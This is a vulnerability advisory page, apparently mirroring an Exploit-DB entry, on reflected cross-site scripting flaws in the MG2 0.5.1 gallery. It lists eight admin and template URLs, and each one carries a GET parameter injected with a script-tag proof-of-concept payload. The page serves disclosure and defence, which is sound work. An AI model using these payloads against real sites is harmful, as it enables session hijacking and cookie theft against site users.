header-logo
Suggest Exploit
vendor:
MG2
by:
7.5
CVSS
HIGH
Cross-Site Scripting
79
CWE
Product Name: MG2
Affected Version From: 2000.5.1
Affected Version To:
Patch Exists: NO
Related CWE:
CPE: a:mg2_project:mg2:0.5.1
Metasploit:
Other Scripts:
Platforms Tested:

Multiple Cross-Site Scripting Vulnerabilities in MG2

MG2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

Mitigation:

To mitigate these vulnerabilities, it is recommended to sanitize and validate user-supplied input before using it in any web application.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/46378/info

MG2 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

MG2 0.5.1 is vulnerable; other versions may also be affected.

http://www.example.com/mg2/skins/rounded/templates/thumbnails_password.php 
 - param(GET): list=25<script>alert(1)</script> 
 - param(GET): id=25<script>alert(1)</script> 

http://www.example.com/mg2/skins/rounded/templates/viewimage_comments.php 
 - param(GET): id=31<script>alert(1)</script>  

http://www.example.com/mg2/skins/admin/admin1_menu.php 
 - param(GET): list=41<script>alert(1)</script> 

http://www.example.com/mg2/skins/admin/admin2_comments.php 
- param(GET): list=45<script>alert(1)</script>  

http://www.example.com/mg2/skins/admin/admin2_edit.php  
- param(GET): editID=53<script>alert(1)</script>  

http://www.example.com/mg2/skins/admin/admin2_newfolder.php 
- param(GET): list=59<script>alert(1)</script> 

http://www.example.com/mg2/skins/admin/admin3_folders.php 
- param(GET): list=71<script>alert(1)</script>